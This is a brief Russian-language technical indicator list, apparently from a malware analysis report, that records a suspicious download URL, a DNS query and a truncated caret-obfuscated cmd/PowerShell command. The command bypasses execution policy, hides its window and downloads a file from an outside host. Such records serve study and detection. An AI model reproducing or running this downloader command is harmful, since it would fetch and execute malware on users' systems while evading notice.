Техническая информация
- http://zofelaseo.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "PoW^E^R^SHEl^l.E^xE -^EX^E^CU^T^iOnpO^LicY ^by^p^A^s^S -^N^O^P^RoFI^L^e ^-WindoWstyl^e HiD^d^EN (N^eW-^Obj^ecT ^sYSTEm^.^N^et^.WE^bCl^I^En^T)^.DO^W^n^L^oAdFI^Le('http://zofela...
- DNS ASK zo###aseo.top
- '<SYSTEM32>\cmd.exe' /c "PoW^E^R^SHEl^l.E^xE -^EX^E^CU^T^iOnpO^LicY ^by^p^A^s^S -^N^O^P^RoFI^L^e ^-WindoWstyl^e HiD^d^EN (N^eW-^Obj^ecT ^sYSTEm^.^N^et^.WE^bCl^I^En^T)^.DO^W^n^L^oAdFI^Le('http://zofela...' (со скрытым окном)